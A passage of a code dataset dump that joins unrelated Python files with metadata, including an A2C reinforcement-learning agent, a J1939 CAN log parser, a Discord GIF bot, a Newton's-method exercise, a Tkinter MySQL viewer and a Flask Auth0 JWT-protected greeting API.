)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"292116121","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.optim as opt\nfrom torch.autograd import Variable\nimport gym\n\nfrom genrl.deep.common import get_model, save_params, load_params, set_seeds, venv\nfrom typing import Union, Tuple, Any, Optional, Dict\n\n\nclass A2C:\n \"\"\"\n Advantage Actor Critic algorithm (A2C)\n The synchronous version of A3C\n Paper: https://arxiv.org/abs/1602.01783\n\n :param network_type: The deep neural network layer types ['mlp']\n :param env: The environment to learn from\n :param gamma: Discount factor\n :param actor_batch_size: Update batch size\n :param lr_actor: Policy Network learning rate\n :param lr_critic: Value Network learning rate\n :param num_episodes: Number of episodes\n :param timesteps_per_actorbatch: Number of timesteps per epoch\n :param max_ep_len: Maximum timesteps in an episode\n :param layers: Number of neurons in hidden layers\n :param noise: Noise function to use\n :param noise_std: Standard deviation for action noise\n :param tensorboard_log: The log location for Tensorboard\\\n(if None, no logging)\n :param seed: Seed for reproducing results\n :param render: True if environment is to be rendered, else False\n :param device: Device to use for Tensor operation ['cpu', 'cuda']\n :param run_num: Model run number if it has already been trained\n :param save_model: Directory the user wants to save models to\n :param save_interval: Number of steps between saves of models\n :type network_type: string\n :type env: Gym Environment\n :type gamma: float\n :type actor_batch_size: int\n :type lr_a: float\n :type lr_c: float\n :type num_episodes: int\n :type timesteps_per_actorbatch: int\n :type max_ep_len: int\n :type layers: tuple or list\n :type noise: function\n :type noise_std: float\n :type tensorboard_log: string\n :type seed: int\n :type render: boolean\n :type device: string\n :type run_num: int\n :type save_model: string\n :type save_interval: int\n \"\"\"\n\n def __init__(\n self,\n network_type: str,\n env: Union[gym.Env, venv],\n gamma: float = 0.99,\n actor_batch_size: int = 64,\n lr_actor: float = 0.01,\n lr_critic: float = 0.1,\n num_episodes: int = 100,\n timesteps_per_actorbatch: int = 4000,\n max_ep_len: int = 1000,\n layers: Tuple = (32, 32),\n noise: Any = None,\n noise_std: float = 0.1,\n tensorboard_log: str = None,\n seed: Optional[int] = None,\n render: bool = False,\n device: Union[torch.device, str] = \"cpu\",\n run_num: int = None,\n save_model: str = None,\n save_interval: int = 1000,\n ):\n self.network_type = network_type\n self.env = env\n self.gamma = gamma\n self.actor_batch_size = actor_batch_size\n self.lr_actor = lr_actor\n self.lr_critic = lr_critic\n self.num_episodes = num_episodes\n self.timesteps_per_actorbatch = timesteps_per_actorbatch\n self.max_ep_len = max_ep_len\n self.layers = layers\n self.noise = noise\n self.noise_std = noise_std\n self.tensorboard_log = tensorboard_log\n self.seed = seed\n self.render = render\n self.run_num = run_num\n self.save_interval = save_interval\n self.save_model = None\n self.save = save_params\n self.load = load_params\n\n # Assign device\n if \"cuda\" in device and torch.cuda.is_available():\n self.device = torch.device(\"cuda\")\n else:\n self.device = torch.device(\"cpu\")\n\n # Assign seed\n if seed is not None:\n set_seeds(seed, self.env)\n\n # Setup tensorboard writer\n self.writer = None\n if self.tensorboard_log is not None: # pragma: no cover\n from torch.utils.tensorboard import SummaryWriter\n\n self.writer = SummaryWriter(log_dir=self.tensorboard_log)\n\n self.create_model()\n\n def create_model(self) -> None:\n \"\"\"\n Creates actor critic model and initialises optimizers\n \"\"\"\n (state_dim, action_dim, discrete, action_lim) = self.get_env_properties()\n\n if self.noise is not None:\n self.noise = self.noise(\n np.zeros_like(action_dim), self.noise_std * np.ones_like(action_dim)\n )\n\n self.ac = get_model(\"ac\", self.network_type)(\n state_dim, action_dim, self.layers, \"V\", discrete, action_lim=action_lim\n ).to(self.device)\n\n self.actor_optimizer = opt.Adam(self.ac.actor.parameters(), lr=self.lr_actor)\n\n self.critic_optimizer = opt.Adam(self.ac.critic.parameters(), lr=self.lr_critic)\n\n self.traj_reward = []\n self.actor_hist = torch.Tensor().to(self.device)\n self.critic_hist = torch.Tensor().to(self.device)\n\n self.actor_loss_hist = torch.Tensor().to(self.device)\n self.critic_loss_hist = torch.Tensor().to(self.device)\n\n # load paramaters if already trained\n if self.run_num is not None:\n self.load(self)\n self.ac.actor.load_state_dict(self.checkpoint[\"actor_weights\"])\n self.ac.critic.load_state_dict(self.checkpoint[\"critic_weights\"])\n for key, item in self.checkpoint.items():\n if key not in [\"actor_weights\", \"critic_weights\"]:\n setattr(self, key, item)\n print(\"Loaded pretrained model\")\n\n def select_action(\n self, state: np.ndarray, deterministic: bool = True\n ) -> np.ndarray:\n \"\"\"\n Selection of action\n\n :param state: Observation state\n :param deterministic: Action selection type\n :type state: int, float, ...\n :type deterministic: bool\n :returns: Action based on the state and epsilon value\n :rtype: int, float, ...\n \"\"\"\n state = torch.as_tensor(state).float().to(self.device)\n\n action, distribution = self.ac.get_action(state)\n log_prob = distribution.log_prob(action)\n value = self.ac.get_value(state)\n\n self.actor_hist = torch.cat([self.actor_hist, log_prob.unsqueeze(0)])\n self.critic_hist = torch.cat([self.critic_hist, value.unsqueeze(0)])\n\n action = action.detach().cpu().numpy()\n\n if self.noise is not None:\n action += self.noise()\n\n return action\n\n def get_traj_loss(self) -> None:\n \"\"\"\n Get trajectory of agent to calculate discounted rewards and \\\ncalculate losses\n \"\"\"\n discounted_reward = 0\n returns = []\n\n for reward in self.traj_reward[::-1]:\n discounted_reward = reward + self.gamma * discounted_reward\n returns.insert(0, discounted_reward)\n\n returns = torch.FloatTensor(returns).to(self.device)\n advantages = Variable(returns) - Variable(self.critic_hist)\n\n actor_loss = torch.mean(torch.mul(advantages, self.actor_hist.mul(-1)))\n\n critic_loss = nn.MSELoss()(self.critic_hist, Variable(returns))\n\n self.actor_loss_hist = torch.cat(\n [self.actor_loss_hist, actor_loss.unsqueeze(0)]\n )\n self.critic_loss_hist = torch.cat(\n [self.critic_loss_hist, critic_loss.unsqueeze(0)]\n )\n\n self.traj_reward = []\n self.actor_hist = torch.Tensor().to(self.device)\n self.critic_hist = torch.Tensor().to(self.device)\n\n def update(self, episode: int) -> None:\n \"\"\"\n Updates actor and critic model parameters\n\n :param episode: Number of the episode at which the agent is training\n :type episode: int\n \"\"\"\n actor_loss = torch.mean(self.actor_loss_hist)\n critic_loss = torch.mean(self.critic_loss_hist)\n\n if self.tensorboard_log:\n self.writer.add_scalar(\"loss/actor\", self.actor_loss, episode)\n self.writer.add_scalar(\"loss/critic\", self.actor_loss, episode)\n\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n self.actor_loss_hist = torch.Tensor().to(self.device)\n self.critic_loss_hist = torch.Tensor().to(self.device)\n\n def learn(self): # pragma: no cover\n \"\"\"\n Trains actor critic model\n \"\"\"\n for episode in range(self.num_episodes):\n episode_reward = 0\n steps = []\n for i in range(self.actor_batch_size):\n state = self.env.reset()\n done = False\n\n for t in range(self.timesteps_per_actorbatch):\n action = self.select_action(state)\n state, reward, done, _ = self.env.step(action)\n\n if self.render:\n self.env.render()\n\n self.traj_reward.append(reward)\n\n if done:\n steps.append(t)\n break\n\n episode_reward += np.sum(self.traj_reward) / self.actor_batch_size\n self.get_traj_loss()\n\n self.update(episode)\n\n if episode % 5 == 0:\n print(\"Episode: {}, Reward: {}\".format(episode, episode_reward))\n if self.tensorboard_log:\n self.writer.add_scalar(\"reward\", episode_reward, episode)\n\n if self.save_model is not None:\n if episode % self.save_interval == 0:\n self.checkpoint = self.get_hyperparams()\n self.save(self, episode)\n print(\"Saved current model\")\n\n self.env.close()\n if self.tensorboard_log:\n self.writer.close()\n\n def get_env_properties(self):\n \"\"\"\n Helper function to extract the observation and action space\n\n :returns: Observation space, Action Space and whether the action \\\nspace is discrete or not\n :rtype: int, float, ... ; int, float, ... ; bool\n \"\"\"\n state_dim = self.env.observation_space.shape[0]\n\n if isinstance(self.env.action_space, gym.spaces.Discrete):\n action_dim = self.env.action_space.n\n disc = True\n action_lim = None\n elif isinstance(self.env.action_space, gym.spaces.Box):\n action_dim = self.env.action_space.shape[0]\n action_lim = self.env.action_space.high[0]\n disc = False\n else:\n raise NotImplementedError\n\n return state_dim, action_dim, disc, action_lim\n\n def get_hyperparams(self) -> Dict[str, Any]:\n \"\"\"\n Loads important hyperparameters that need to be loaded or saved\n\n :returns: Hyperparameters that need to be saved or loaded\n :rtype: dict\n \"\"\"\n hyperparams = {\n \"network_type\": self.network_type,\n \"timesteps_per_actorbatch\": self.timesteps_per_actorbatch,\n \"gamma\": self.gamma,\n \"actor_batch_size\": self.actor_batch_size,\n \"lr_actor\": self.lr_actor,\n \"lr_critic\": self.lr_critic,\n \"actor_weights\": self.ac.actor.state_dict(),\n \"critic_weights\": self.ac.critic.state_dict(),\n }\n\n return hyperparams\n\n\nif __name__ == \"__main__\":\n env = gym.make(\"CartPole-v0\")\n algo = A2C(\"mlp\", env)\n algo.learn()\n","sub_path":"genrl/deep/agents/a2c/a2c.py","file_name":"a2c.py","file_ext":"py","file_size_in_byte":11375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"328358480","text":"#!/usr/bin/env python3\nimport struct\nimport matplotlib.pyplot as plt\n\nPRIORITY_MASK = 0x1C000000\nPDU_FORMAT_MASK = 0x00FF0000\nPDU_SPECIFIC_MASK = 0x0000FF00 \nSOURCE_ADDRESS_MASK = 0x000000FF \nDATA_PAGE_MASK = 0x01000000 \nEXT_DATA_PAGE_MASK = 0x02000000 \nPDU1_PGN_MASK = 0x03FF0000 \nPDU2_PGN_MASK = 0x03FFFF00\n\nPRIORITY_OFFSET = 26 \nPDU_FORMAT_OFFSET = 16 \nDA_OFFSET = 8 \nPGN_OFFSET = 8\nPDU2_THRESHOLD = 240\n\nGLOBAL_SOURCE_ADDR = 0xFF\nENGINE_SA = 0\n\nCANDUMP_TIMESTAMP_ADDR = 0\nCANDUMP_CHANNEL_ADDR = 1\nCANDUMP_ID_ADDR = 2\nCANDUMP_DLC_ADDR = 3\nDATA_START_ADDR = 4\n\nPGN_EEC1 = 61444\n\nSPN190_SCALE = 0.125 #RPM/bit\nSPN190_OFFSET = 0\n\ndef main():\n spn190_times = []\n spn190_values = []\n filename = 'KWTruck.txt'\n with open(filename,'r') as f:\n for line in f:\n # We knew this data file was from Linux SocketCAN using candump.\n j1939_frame = parse_candump_line(line)\n # Add the additional results from parsing the id\n j1939_frame.update(parseJ1939id(j1939_frame['id']))\n transport_data = parseJ1939(j1939_frame)\n if transport_data is not None:\n j1939_frame.update(transport_data)\n # PGN for electronic engine control 1 messsage\n if (j1939_frame['pgn'] == PGN_EEC1 and \n j1939_frame[\"source_address\"] == ENGINE_SA): \n # Unpack the engine speed data in big endian format and \n # convert to engineering values\n rpm = (struct.unpack('> PRIORITY_OFFSET\n pf = (id & PDU_FORMAT_MASK) >> PDU_FORMAT_OFFSET\n if (pf < PDU2_THRESHOLD): # See SAE J1939-21\n # PDU 1 format uses values lower than 240\n da = (id & PDU_SPECIFIC_MASK) >> DA_OFFSET\n pgn = (id & PDU1_PGN_MASK) >> PGN_OFFSET\n else: # PDU 2 format\n da = GLOBAL_SOURCE_ADDR\n pgn = (id & PDU2_PGN_MASK) >> PGN_OFFSET\n return {'source_address': sa,\n 'priority': priority,\n 'destination_address': da,\n 'pgn': pgn}\n\ndef parse_candump_line(line):\n # Strip the newline characters and white space off the ends\n # then split the string into a list based on whitespace. \n data = line.strip().split() \n # can_dump formats use parenthese to wrap the floating\n # point timestamp. We just want the numbers so use [1:-1] to slice\n time_stamp = float(data[CANDUMP_TIMESTAMP_ADDR][1:-1])\n # physical CAN channel\n channel = data[CANDUMP_CHANNEL_ADDR]\n # determine the can arbitration identifier as an integer\n can_id = int(data[CANDUMP_ID_ADDR],16)\n # Data length code is a single byte wrapped in []\n dlc = int(data[CANDUMP_DLC_ADDR][1])\n # Build the data field as a byte array\n data_bytes = b''\n for byte_string in data[DATA_START_ADDR:]:\n # Convert text into a single byte\n data_bytes += struct.pack('B',int(byte_string,16))\n #assert dlc == len(data_bytes)\n can_frame = {'id':can_id,\n 'dlc':dlc,\n 'data':data_bytes,\n 'timestamp':time_stamp,\n 'channel':channel}\n return can_frame\n\nTP_messages = {}\ndef parseJ1939(j1939_message):\n pgn = j1939_message['pgn']\n sa = j1939_message['source_address']\n da = j1939_message['destination_address']\n j1939_data_frame = j1939_message['data']\n if pgn == 0xEC00: #Transport Protocol Connection Management (TP.CM)\n control_byte = j1939_data_frame[0]\n if control_byte == 16: #Connection Mode Request to Send (TP.CM_RTS): Destination Specific\n message_size = struct.unpack('gifs_search_get: %s\\n\" % e\r\n\r\n#[BOT COMMANDS]:\r\n\r\n#for reacting to user\r\nasync def on_message(self,message):\r\n l=[\"hi\",\"Hi\",\"Hello\",\"hello\",\"Konichiwa\",\"konichiwa\",\"Bye\",\"bye\",\"sayonara\",\"Sayonara\"]\r\n if message.author!= self.user: \r\n if message.content in l:\r\n gif= await search_gifs(message)\r\n await message.channel.send(message+gif)\r\n\r\n#to check the guessed number\r\n@bot.command()\r\nasync def g(ctx,a):\r\n userID= ctx.author.mention\r\n #ID=userID.split(\"#\")\r\n #print(userID)\r\n\r\n if int(a)==r:\r\n rand()\r\n gif= await search_gifs(\"Clap\")\r\n await ctx.send(userID+\" Sugoi! \"+gif)\r\n \r\n else:\r\n await ctx.send(userID+\" Better luck next time!😢\")\r\n \r\n#to kill bot\r\n@bot.command()\r\nasync def kill(ctx):\r\n await ctx.send(\"Ahhhhhhh!\")\r\n await ctx.bot.logout()\r\n\r\n\r\n#print gif according to keyword\r\n@bot.command()\r\nasync def gif(ctx,e):\r\n gif = await search_gifs(e)\r\n await ctx.send('Gif URL : ' + gif)\r\n\r\nbot.run('token')\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"57140367","text":"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n\"\"\"\nTest functions for models.GLM\n\"\"\"\n\nimport numpy as np\n\nfrom .. import family\nfrom ..glm import Model as GLM\n\nfrom nose.tools import assert_equal\n\nW = np.random.standard_normal\n\n\ndef test_Logistic():\n X = W((40,10))\n Y = np.greater(W((40,)), 0)\n cmodel = GLM(design=X, family=family.Binomial())\n results = cmodel.fit(Y)\n assert_equal(results.df_resid, 30)\n\n\ndef test_Logisticdegenerate():\n X = W((40,10))\n X[:,0] = X[:,1] + X[:,2]\n Y = np.greater(W((40,)), 0)\n cmodel = GLM(design=X, family=family.Binomial())\n results = cmodel.fit(Y)\n assert_equal(results.df_resid, 31)\n","sub_path":"nipy/algorithms/statistics/models/tests/test_glm.py","file_name":"test_glm.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"650914763","text":"import sys\r\n\r\ntry:\r\n\tfrom speech_gen import *\r\n\tfrom speech_rec import *\r\nexcept:\r\n\tsys.exit(\"Could not find speech_gen or speech_rec. Make sure all files made it.\")\r\n\r\ntry:\r\n\timport cleverwrap as cw\r\nexcept:\r\n\tsys.exit(\"Error importing libraries. Install \\\"cleverwrap\\\"\")\r\n\r\n#The log file.\r\nlog_file = \"log.txt\"\r\n\r\n#Where your cleverbot api key should go.\r\nCB_API_KEY = \"\"\r\n\r\n#Initialize the log file.\r\ntry:\r\n\tlog = open(log_file, \"a\")\r\nexcept:\r\n\tprint(\"!!!!Couldn't open log file for writing!!!!!\")\r\n\tsys.exit(-1)\r\n\r\n#Initialize the speech tools.\r\nsgInit()\r\nsrInit()\r\n\r\n#Initialize CleverBot\r\ntry:\r\n\tcb = cw.CleverWrap(CB_API_KEY)\r\nexcept:\r\n\tprint(\"!!!!Couldn't initialize CleverWrap!!!!!\")\r\n\tsys.exit(-3)\r\n\r\n#The speech that goes into and comes\r\n#out of cleverbot.\r\nin_speech = \"\"\r\nout_speech = \"\"\r\n\r\nlog.write(\"New conversation.\\n\")\r\n\r\n#Begin the main loop\r\nwhile True:\r\n\t#Gather microphone input and log it.\r\n\tin_speech = hear()\r\n\tlog.write(\"In: \" + in_speech + \"\\n\")\r\n\tprint(in_speech)\r\n\t\r\n\t#Gather Cleverbot's response, log it, and say it.\r\n\tout_speech = cb.say(in_speech)\r\n\tlog.write(\"Out: \" + out_speech + \"\\n\")\r\n\tprint(out_speech)\r\n\tsay(out_speech)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"338199421","text":"import mysql.connector\nimport tkinter.ttk as ttk\nfrom tkinter import *\n\nmy_db = mysql.connector.connect(\n host='localhost',\n user='root',\n password='123456',\n port='3306',\n database='moadb'\n)\n\nmy_cursor = my_db.cursor()\n\nroot = Tk()\nroot.geometry(\"725x450\")\n\nmain_frame = Frame(root)\nmain_frame.pack(fill=BOTH, expand=1)\n\nmy_canvas = Canvas(main_frame)\nmy_canvas.pack(side=LEFT, fill=BOTH, expand=1)\n\nmy_scrollbar = ttk.Scrollbar(main_frame, orient=VERTICAL, command=my_canvas.yview)\nmy_scrollbar.pack(side=RIGHT, fill=Y)\n\nmy_canvas.configure(yscrollcommand=my_scrollbar.set)\n\nmy_canvas.bind('', lambda e: my_canvas.configure(scrollregion=my_canvas.bbox(\"all\")))\n\nsecond_frame = Frame(my_canvas)\n\nmy_canvas.create_window((0, 0), window=second_frame, anchor=\"nw\")\n\ncolumn_list = [\"Match\", \"Date\", \"Side\", \"Top\", \"Jungle\", \"Mid\", \"ADC\", \"Support\", \"Result\"]\ni = 0\nfor column in column_list:\n c = Label(second_frame, width=13, text=column, relief=\"ridge\", borderwidth=2, font=\"helvetica 10 bold\")\n c.grid(row=0, column=i)\n i += 1\n\nquery = \"select id from gameresult\"\nmy_cursor.execute(query)\nresult = my_cursor.fetchall()\ni = 1\nfor x in result:\n c = Label(second_frame, width=15, text=x[0], relief=\"ridge\", height=2)\n c.grid(row=i, column=0, rowspan=2)\n i += 2\nquery = \"select game_date from gameresult\"\nmy_cursor.execute(query)\nresult = my_cursor.fetchall()\ngame_counts = (len(result))\ni = 1\nfor x in result:\n c = Label(second_frame, width=15, text=x[0], relief=\"ridge\", height=2)\n c.grid(row=i, column=1, rowspan=2)\n i += 2\n\nfor x in range(1, game_counts*2, 2):\n Label(second_frame, text=\"Red Team\", width=15, relief=\"ridge\").grid(row=x, column=2)\n Label(second_frame, text=\"Blue Team\", width=15, relief=\"ridge\").grid(row=x+1, column=2)\n\nquery = \"select top from redteam\"\nmy_cursor.execute(query)\nresult = my_cursor.fetchall()\ni = 0\nfor x in result:\n c = Label(second_frame, width=15, text=x[0], relief=\"ridge\")\n c.grid(row=i+1, column=3)\n i += 2\n\nquery = \"select top from blueteam\"\nmy_cursor.execute(query)\nresult = my_cursor.fetchall()\ni = 1\nfor x in result:\n c = Label(second_frame, width=15, text=x[0], relief=\"ridge\")\n c.grid(row=i+1, column=3)\n i += 2\nroot.mainloop()","sub_path":"ViewGames.py","file_name":"ViewGames.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"3247895","text":"# EX 1\nint1 = 5\nint2 = 5\n\nstring1 = \"Hello\"\nstring2 = \"Hello\"\n\nfloat1 = 0.1\nfloat2 = 0.1\n\nprint(int1 is int2) # Output: True\nprint(string1 is string2) # Output: True\nprint(float1 is float2) # Output: True\n\n# EX 2\n\ndict1 = {\"name\": \"pipusna\", \"age\": \"26\"}\ndict2 = {\"name\": \"pipusna\", \"age\": \"26\"}\ndict3 = dict1\n\nprint(dict1 is dict3) # Output: True\nprint(dict1 is dict2) # Output: Flase\nprint(dict1 == dict2) # Output: True\n\n# Tuple, Set, List","sub_path":"Python Operators/Identity operators.py","file_name":"Identity operators.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"208026632","text":"# File: newton.py\n# Abraham Sharp\n# ECS 36 A\n#\n# Wai Hei Ngan\n#\n# Newton Method\nimport math\n\ndef newton(a,b,c):\n x=0 # initial guess\n for i in range (10): # run loop 10 times\n x = float(x) # convert x to floating points\n # newton method formula\n x= x-((x**3)+(a*(x**2))+(b*x+c))/((3*(x**2))+(2*a*x)+b)\n # print the approximate solution\n print (\"The approximate solution of x^3+5x-3 is:\",x)\n return x\ndef newtonExact(a,b,c):\n x = 0\n x = -b+(math.sqrt(abs((b)**2-4*a*c)/2*a))\n print (x)\n return x\n\n\n# loop followings\nwhile True:\n # ask user for input for x^2 coefficient\n a = input(\"Enter the integer coefficient of x^2:\")\n # try convert to int, if ValueError, then print coefficents must be integers and go back to the input\n try:\n a = int(a)\n except ValueError:\n print(\"Coefficients must be integers\")\n continue\n # if the int is any interger then break out the loop\n if a < 0 or a == 0 or a >0:\n break\n\n# loop followings\nwhile True:\n # ask user for input for x^2 coefficient\n b = input(\"Enter the integer coefficient of x:\")\n # try convert to int, if ValueError, then print coefficents must be integers and go back to the input\n try:\n b = int(b)\n except ValueError:\n print(\"Coefficients must be integers\")\n continue\n # if the int is any interger then break out the loop\n if b < 0 or b == 0 or b >0:\n break\n \n# loop followings\nwhile True:\n # ask user for input for x^2 coefficient\n c = input(\"Enter the integer constant term:\")\n # try convert to int, if ValueError, then print coefficents must be integers and go back to the input\n try:\n c = int(c)\n except ValueError:\n print(\"Coefficients must be integers\")\n continue\n # if the int is any interger then break out the loop\n if c < 0 or c == 0 or c > 0:\n break\n \nnewton(a,b,c) #calls function with (a,b,c)\nnewtonExact(a,b,c)\n","sub_path":"ECS 36A/newton.py","file_name":"newton.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"511173350","text":"# Part B Task 2\nimport re\nimport os\nimport sys\n\ndef reverse_case(match_obj):\n char_elem = match_obj.group(0)\n if char_elem.islower():\n return char_elem.upper()\n else:\n return char_elem.lower() \n\n \n \ndef preprocessing(file_name):\n f = open(file_name)\n file_string = f.read()\n\n#pattern\n pattern = '[^a-zA-Z \\\\n]+'\n\n x1 = re.sub(pattern, \"\", file_string)\n\n x2 = re.sub(\"[\\s+\\\\n+]+\",' ',x1)\n\n x3 = re.sub('[A-Z]+', reverse_case,x2)\n return x3\n\nfilename = sys.argv[-1]\na = slice(7)\nname = slice(7,14)\n\nprint(preprocessing(filename[a]+'/' + filename[name]))\n\n\n\n","sub_path":"partb2.py","file_name":"partb2.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"640100190","text":"# -*- coding: utf-8 -*-\nimport pytest\n\nfrom os.path import join\n\nfrom pyleecan.Classes.ForceMT import ForceMT\nfrom pyleecan.Classes.OPdq import OPdq\nfrom pyleecan.Classes.Simu1 import Simu1\nfrom pyleecan.Classes.MagFEMM import MagFEMM\nfrom pyleecan.Classes.InputCurrent import InputCurrent\n\nfrom pyleecan.Functions.load import load\nfrom pyleecan.Functions.Plot import dict_2D\nfrom pyleecan.definitions import DATA_DIR\nfrom Tests import save_validation_path as save_path\n\n\n@pytest.mark.long_5s\n@pytest.mark.long_1m\n@pytest.mark.MagFEMM\n@pytest.mark.ForceMT\n@pytest.mark.SIPMSM\n@pytest.mark.periodicity\n@pytest.mark.SingleOP\ndef test_compare_Kmesh():\n \"\"\"Validation of the AGSF transfer algorithm for SPMSM benchmark machine: sensitivity to the maximum considered wavenumbers\"\"\"\n\n # Load machine\n Benchmark = load(join(DATA_DIR, \"Machine\", \"Benchmark.json\"))\n\n # Prepare simulation\n simu = Simu1(name=\"test_compare_Kmesh_direct\", machine=Benchmark)\n\n simu.input = InputCurrent(\n OP=OPdq(N0=1200, Id_ref=0, Iq_ref=0),\n Ir=None,\n Na_tot=5 * 2 ** 8,\n Nt_tot=2,\n )\n\n # Configure simulation\n simu.elec = None\n\n simu.force = ForceMT()\n\n simu.mag = MagFEMM(\n is_periodicity_a=False,\n is_periodicity_t=False,\n is_sliding_band=False,\n Kmesh_fineness=1,\n )\n\n Rsbo = 0.0480\n Rrbo = 0.0450\n Rs = (Rsbo - Rrbo) * 99 / 100 + Rrbo\n\n simu2 = simu.copy()\n simu2.name = \"test_compare_Kmesh_transfer\"\n simu2.force.is_agsf_transfer = True\n simu2.force.Rsbo_enforced_transfer = Rs\n simu2.force.max_wavenumber_transfer = 100\n\n # Enforced Rag for ref\n simu.mag.Rag_enforced = Rs\n\n # Simu with low finesness\n simu3 = simu.copy()\n simu3.name = \"test_compare_Kmesh_direct_fine\"\n simu3.mag.Kmesh_fineness = 2 # 4\n out = simu.run()\n out2 = simu2.run()\n out3 = simu3.run()\n\n AGSF_list = list()\n AGSF_list.append(out2.force.AGSF)\n AGSF_list.append(out3.force.AGSF)\n legend_list = [\"Direct\", \"Transfer\", \"Direct Fine Mesh\"]\n\n # out.force.AGSF.plot_2D_Data(\n # \"angle=[0,3.14]\",\n # \"time=0\",\n # data_list=AGSF_list,\n # legend_list=legend_list,\n # save_path=join(save_path, \"test_compare_Kmesh.png\"),\n # is_show_fig=False,\n # **dict_2D\n # )\n\n out.force.AGSF.plot_2D_Data(\n \"wavenumber\",\n \"freqs=0\",\n x_min=-1,\n x_max=37,\n data_list=AGSF_list,\n legend_list=legend_list,\n save_path=join(save_path, \"test_compare_Kmesh_fft.png\"),\n is_show_fig=False,\n barwidth=800,\n **dict_2D\n )\n\n return out, out2, out3\n\n\nif __name__ == \"__main__\":\n\n out, out2, out3 = test_compare_Kmesh()\n","sub_path":"Tests/Validation/Force/AGSF_Transfer/test_compare_Kmesh.py","file_name":"test_compare_Kmesh.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"30547978","text":"from flask import Flask, request, jsonify, abort\n\nimport json\nfrom functools import wraps\nfrom jose import jwt\nfrom urllib.request import urlopen\n\napp = Flask(__name__)\n\nAUTH0_DOMAIN = 'dev-dz4.us.auth0.com'\nALGORITHMS = ['RS256']\nAPI_AUDIENCE = 'image'\n\n\nclass AuthError(Exception):\n def __init__(self, error, status_code):\n self.error = error\n self.status_code = status_code\n\n\ndef get_token_auth_header():\n \"\"\"Obtains the Access Token from the Authorization Header\n \"\"\"\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError({\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected.'\n }, 401)\n\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\".'\n }, 401)\n\n elif len(parts) == 1:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Token not found.'\n }, 401)\n\n elif len(parts) > 2:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must be bearer token.'\n }, 401)\n\n token = parts[1]\n return token\n\n\ndef verify_decode_jwt(token):\n jsonurl = urlopen(f'https://{AUTH0_DOMAIN}/.well-known/jwks.json')\n jwks = json.loads(jsonurl.read())\n unverified_header = jwt.get_unverified_header(token)\n rsa_key = {}\n if 'kid' not in unverified_header:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization malformed.'\n }, 401)\n\n for key in jwks['keys']:\n if key['kid'] == unverified_header['kid']:\n rsa_key = {\n 'kty': key['kty'],\n 'kid': key['kid'],\n 'use': key['use'],\n 'n': key['n'],\n 'e': key['e']\n }\n if rsa_key:\n try:\n payload = jwt.decode(\n token,\n rsa_key,\n algorithms=ALGORITHMS,\n audience=API_AUDIENCE,\n issuer='https://' + AUTH0_DOMAIN + '/'\n )\n\n return payload\n\n except jwt.ExpiredSignatureError:\n raise AuthError({\n 'code': 'token_expired',\n 'description': 'Token expired.'\n }, 401)\n\n except jwt.JWTClaimsError:\n raise AuthError({\n 'code': 'invalid_claims',\n 'description': 'Incorrect claims. Please, check the audience and issuer.'\n }, 401)\n except Exception:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Unable to parse authentication token.'\n }, 400)\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Unable to find the appropriate key.'\n }, 400)\n\ndef check_permissions(permission, payload):\n if 'permissions' not in payload:\n raise AuthError({\n 'code': 'invalid_claims',\n 'description': 'Permission not included in JWT.' \n }, 400)\n if permission not in payload['permissions']:\n raise AuthError({\n 'code': 'unauthorized',\n 'description': 'Permission not found.' \n }, 403)\n return True\n\ndef requires_auth(permission=''):\n def requires_auth_ex(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n token = get_token_auth_header()\n try:\n payload = verify_decode_jwt(token)\n except:\n abort(401)\n\n check_permissions(permission, payload)\n return f(payload, *args, **kwargs)\n\n return wrapper\n return requires_auth_ex\n\ngreetings = {\n 'en': 'hello', \n 'es': 'Hola', \n 'ar': 'مرحبا',\n 'ru': 'Привет',\n 'fi': 'Hei',\n 'he': 'שלום',\n 'ja': 'こんにちは'\n }\n\n@app.route('/greeting', methods=['GET'])\n@requires_auth('view:image')\ndef greeting_all(payload):\n print(payload)\n return jsonify({'greetings': greetings})\n\n@app.route('/greeting/', methods=['GET'])\ndef greeting_one(lang):\n print(lang)\n if(lang not in greetings):\n abort(404)\n return jsonify({'greeting': greetings[lang\n ]})\n\n@app.route('/greeting', methods=['POST'])\ndef greeting_add():\n info = request.get_json()\n if('lang' not in info or 'greeting' not in info):\n 